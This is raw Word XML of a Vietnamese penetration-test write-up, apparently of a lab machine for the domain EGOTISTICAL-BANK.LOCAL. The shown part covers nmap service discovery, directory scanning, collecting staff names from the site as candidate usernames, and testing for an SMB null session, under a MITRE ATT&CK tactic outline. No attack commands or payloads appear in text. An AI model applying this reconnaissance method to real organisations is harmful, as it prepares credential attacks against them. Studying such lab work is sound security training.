            <w:r w:rsidRPr="008E7865">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2. Summary - Mapping MITRE ATT&amp;CK</w:t>
            </w:r>
            <w:r w:rsidRPr="008E7865">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008E7865">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidRPr="008E7865">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc152522893 \h </w:instrText>
            </w:r>
            <w:r w:rsidRPr="008E7865">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidRPr="008E7865">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidRPr="008E7865">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
            <w:r w:rsidRPr="008E7865">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="051249DA" w14:textId="4E6A8817" w:rsidR="008E7865" w:rsidRPr="008E7865" w:rsidRDefault="008E7865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52522894" w:history="1">
            <w:r w:rsidRPr="008E7865">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Tactics: Reconnaissance</w:t>
            </w:r>
            <w:r w:rsidRPr="008E7865">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008E7865">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidRPr="008E7865">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc152522894 \h </w:instrText>
            </w:r>
            <w:r w:rsidRPr="008E7865">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidRPr="008E7865">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidRPr="008E7865">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
            <w:r w:rsidRPr="008E7865">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="29A7DA58" w14:textId="5469B226" w:rsidR="008E7865" w:rsidRPr="008E7865" w:rsidRDefault="008E7865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52522895" w:history="1">
            <w:r w:rsidRPr="008E7865">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Tactics: Credentials Access</w:t>
            </w:r>
            <w:r w:rsidRPr="008E7865">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008E7865">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidRPr="008E7865">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc152522895 \h </w:instrText>
            </w:r>
            <w:r w:rsidRPr="008E7865">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidRPr="008E7865">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidRPr="008E7865">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
            <w:r w:rsidRPr="008E7865">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="27702F42" w14:textId="04E5349E" w:rsidR="008E7865" w:rsidRPr="008E7865" w:rsidRDefault="008E7865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52522896" w:history="1">
            <w:r w:rsidRPr="008E7865">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Tactics: Discovery</w:t>
            </w:r>
            <w:r w:rsidRPr="008E7865">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008E7865">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidRPr="008E7865">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc152522896 \h </w:instrText>
            </w:r>
            <w:r w:rsidRPr="008E7865">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidRPr="008E7865">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidRPr="008E7865">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
            <w:r w:rsidRPr="008E7865">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="15D1CB89" w14:textId="20836108" w:rsidR="008E7865" w:rsidRPr="008E7865" w:rsidRDefault="008E7865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52522897" w:history="1">
            <w:r w:rsidRPr="008E7865">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Tactics: Lateral Movement</w:t>
            </w:r>
            <w:r w:rsidRPr="008E7865">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008E7865">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidRPr="008E7865">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc152522897 \h </w:instrText>
            </w:r>
            <w:r w:rsidRPr="008E7865">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidRPr="008E7865">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidRPr="008E7865">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>11</w:t>
            </w:r>
            <w:r w:rsidRPr="008E7865">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6E92166A" w14:textId="2C7A0CB7" w:rsidR="000D5854" w:rsidRPr="00147C0B" w:rsidRDefault="000D5854" w:rsidP="000D5854">
          <w:pPr>
            <w:rPr>
              <w:rFonts w:cs="Times New Roman"/>
              <w:color w:val="000000" w:themeColor="text1"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="008E7865">
            <w:rPr>
              <w:rFonts w:cs="Times New Roman"/>
              <w:noProof/>
              <w:color w:val="000000" w:themeColor="text1"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="5D337143" w14:textId="02DF9FEB" w:rsidR="00835C8F" w:rsidRPr="00C82ABC" w:rsidRDefault="00835C8F" w:rsidP="00835C8F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color w:val="000000" w:themeColor="text1"/>
          <w:kern w:val="36"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc152522878"/>
      <w:r w:rsidRPr="00C82ABC">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:kern w:val="36"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>1. Technicals Details</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="198D03D7" w14:textId="77777777" w:rsidR="00835C8F" w:rsidRPr="00C82ABC" w:rsidRDefault="00835C8F" w:rsidP="00835C8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 w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc152522879"/>
      <w:r w:rsidRPr="00C82ABC">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>1.1. Reconnaissance</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w14:paraId="5249127C" w14:textId="0AEFEE42" w:rsidR="00916569" w:rsidRPr="00C82ABC" w:rsidRDefault="00835C8F" w:rsidP="00835C8F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 w:themeColor="text1"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc152522880"/>
      <w:r w:rsidRPr="00C82ABC">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Nmap scan</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w14:paraId="330CEE78" w14:textId="662BD2D6" w:rsidR="00DB12A9" w:rsidRPr="00C82ABC" w:rsidRDefault="0059743C" w:rsidP="00011093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2"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0059743C">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4AD62DBB" wp14:editId="3EA96C50">
            <wp:extent cx="3171825" cy="2252716"/>
            <wp:effectExtent l="0" t="0" r="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4396" cy="226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CBB" w:rsidRPr="00C82ABC">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00563FCA" w:rsidRPr="00563FCA">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3A443B93" wp14:editId="57BC61EC">
            <wp:extent cx="4438597" cy="2924816"/>
            <wp:effectExtent l="0" t="0" r="635" b="8890"/>
            <wp:docPr id="24" name="Picture 24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computer screen shot of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7561" cy="293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FBBD" w14:textId="6AE58BE8" w:rsidR="00C82ABC" w:rsidRPr="00E67D61" w:rsidRDefault="00F136EF" w:rsidP="00011093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2"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C82ABC">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Phân tích kết quả của nmap, ta có các thông tin đáng chú ý sau:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55E02E7C" w14:textId="77777777" w:rsidR="00F136EF" w:rsidRPr="00F136EF" w:rsidRDefault="00F136EF" w:rsidP="00F136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2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F136EF">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Có các services: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14369D25" w14:textId="59D7E32F" w:rsidR="00D107DE" w:rsidRPr="00A7705E" w:rsidRDefault="00D107DE" w:rsidP="00F136E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2"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>DNS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve"> port 53</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A337683" w14:textId="521EF110" w:rsidR="00A7705E" w:rsidRDefault="00A7705E" w:rsidP="00F136E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2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>Kerberos port 88</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56F8DEB4" w14:textId="4650A7BE" w:rsidR="005240D1" w:rsidRPr="00D107DE" w:rsidRDefault="005240D1" w:rsidP="00D107D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2"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Ldap port </w:t>
      </w:r>
      <w:r w:rsidR="0041773E">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>389</w:t>
      </w:r>
      <w:r w:rsidR="0041773E">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>: Domain EGOTISTICAL-BANK.LOCAL0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="298B0A7D" w14:textId="0C7EB5CE" w:rsidR="00E67D61" w:rsidRPr="00E67D61" w:rsidRDefault="00F136EF" w:rsidP="00E67D6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2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00147C0B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Dịch</w:t>
      </w:r>
      <w:r w:rsidRPr="00147C0B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve"> vụ </w:t>
      </w:r>
      <w:r w:rsidRPr="00147C0B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:r w:rsidRPr="00147C0B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve"> port </w:t>
      </w:r>
      <w:r w:rsidR="00E67D61">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve">80: chạy backend </w:t>
      </w:r>
      <w:r w:rsidR="0045616D">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>windows I</w:t>
      </w:r>
      <w:r w:rsidR="00E67D61">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>IS httpd 10.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="226D0705" w14:textId="40B47950" w:rsidR="0059743C" w:rsidRDefault="00C82ABC" w:rsidP="0059743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2"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">SMB </w:t>
      </w:r>
      <w:r w:rsidR="001313AB">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">port </w:t>
      </w:r>
      <w:r w:rsidR="0059743C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>445</w:t>
      </w:r>
      <w:r w:rsidR="00D450E9">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>: message signing enabled</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31B7080A" w14:textId="27148CDA" w:rsidR="00A7705E" w:rsidRPr="00A7705E" w:rsidRDefault="000D0CC1" w:rsidP="00A7705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2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D0CC1">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>Windows Remote Management</w:t>
      </w:r>
      <w:r w:rsidR="0059743C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve"> port 5985</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D81AEA4" w14:textId="6877994C" w:rsidR="00D267A6" w:rsidRDefault="00D267A6" w:rsidP="00D267A6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 w:themeColor="text1"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc152522881"/>
      <w:r w:rsidRPr="00147C0B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>Web page</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w14:paraId="7444C9BA" w14:textId="0DA38BA9" w:rsidR="0041773E" w:rsidRPr="0041773E" w:rsidRDefault="0041773E" w:rsidP="00B635B2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lastRenderedPageBreak/>
        <w:t>Danh sách các directory scan được từ dirsearch:</w:t>
      </w:r>
      <w:r w:rsidRPr="0041773E">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="628C0DFD" wp14:editId="74ADD53D">
            <wp:extent cx="3770061" cy="1928250"/>
            <wp:effectExtent l="0" t="0" r="1905" b="0"/>
            <wp:docPr id="21" name="Picture 21" descr="A computer screen with many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omputer screen with many colorful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8969" cy="193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1039" w14:textId="77777777" w:rsidR="00D267A6" w:rsidRDefault="00D267A6" w:rsidP="00B635B2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>/about.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DE33D59" w14:textId="0D306D52" w:rsidR="00D267A6" w:rsidRDefault="00D267A6" w:rsidP="00B635B2">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D267A6">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2C63AB2C" wp14:editId="1C6BE2A5">
            <wp:extent cx="2264997" cy="2540281"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1" name="Picture 1" descr="A group of people in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in circl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8451" cy="255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976B" w14:textId="0172460D" w:rsidR="00D267A6" w:rsidRDefault="00D267A6" w:rsidP="00B635B2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>Ta biết được các nhân viên sau:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17F61A6C" w14:textId="5EA4ABA4" w:rsidR="00D267A6" w:rsidRDefault="00D267A6" w:rsidP="00B635B2">
      <w:pPr>
        <w:ind w:left="144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>Fergus Smith</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E599449" w14:textId="06579493" w:rsidR="00D267A6" w:rsidRDefault="00D267A6" w:rsidP="00B635B2">
      <w:pPr>
        <w:ind w:left="144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>Shaun Coins</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68EB707D" w14:textId="1DE4736A" w:rsidR="00D267A6" w:rsidRDefault="00D267A6" w:rsidP="00B635B2">
      <w:pPr>
        <w:ind w:left="144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>Sophie Driver</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="602C69DF" w14:textId="44F8F51A" w:rsidR="00D267A6" w:rsidRDefault="00D267A6" w:rsidP="00B635B2">
      <w:pPr>
        <w:ind w:left="144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>Hugo Bear</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DDFD019" w14:textId="226AC62F" w:rsidR="00D267A6" w:rsidRDefault="00D267A6" w:rsidP="00B635B2">
      <w:pPr>
        <w:ind w:left="144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>Bowie Taylor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7541C7BF" w14:textId="7D5DE539" w:rsidR="00D267A6" w:rsidRDefault="00D267A6" w:rsidP="00B635B2">
      <w:pPr>
        <w:ind w:left="144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>Steven Kerb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="162FB372" w14:textId="642B2F2D" w:rsidR="00D267A6" w:rsidRDefault="00D267A6" w:rsidP="00B635B2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>/contact.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67BDBCCB" w14:textId="3439A198" w:rsidR="00D267A6" w:rsidRDefault="00D267A6" w:rsidP="00B635B2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 w:rsidRPr="00D267A6">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4D341ED6" wp14:editId="24E5D113">
            <wp:extent cx="2916634" cy="568718"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
            <wp:docPr id="20" name="Picture 20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-up of a sig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5392" cy="58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FECF" w14:textId="1F9298A0" w:rsidR="00D267A6" w:rsidRPr="00D267A6" w:rsidRDefault="00D267A6" w:rsidP="00984A38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>Tìm được thông tin user: W3layouts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CF23284" w14:textId="470DBCA1" w:rsidR="00275E5B" w:rsidRPr="00275E5B" w:rsidRDefault="00FF6B23" w:rsidP="00275E5B">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc152522882"/>
      <w:r w:rsidRPr="00D267A6">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>SMB</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w14:paraId="7DDA3FD0" w14:textId="75C94FF7" w:rsidR="00275E5B" w:rsidRDefault="00275E5B" w:rsidP="0005243D">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00275E5B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>Sử dụng smbclient để kiểm tra, với null sessions ta hoàn toàn có thể login nhưng không có bất kì quyền gì để listing shares.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="733BBC88" w14:textId="23E2F117" w:rsidR="00FF6B23" w:rsidRDefault="00FF6B23" w:rsidP="00275E5B">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF6B23">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="245431EE" wp14:editId="27414966">
            <wp:extent cx="4033203" cy="1076765"/>
            <wp:effectExtent l="0" t="0" r="5715" b="9525"/>
            <wp:docPr id="2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5092" cy="109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F74E" w14:textId="767C9084" w:rsidR="00FF6B23" w:rsidRDefault="00FF6B23" w:rsidP="0005243D">
      <w:pPr>
        <w:ind w:left="36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>Khi tìm được credentials quay lại sau.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23C115AF" w14:textId="6B8EC8AC" w:rsidR="00CD3F05" w:rsidRPr="0061181E" w:rsidRDefault="00CD3F05" w:rsidP="00CD3F05">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc152522883"/>
      <w:r w:rsidRPr="0061181E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>LDAP</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
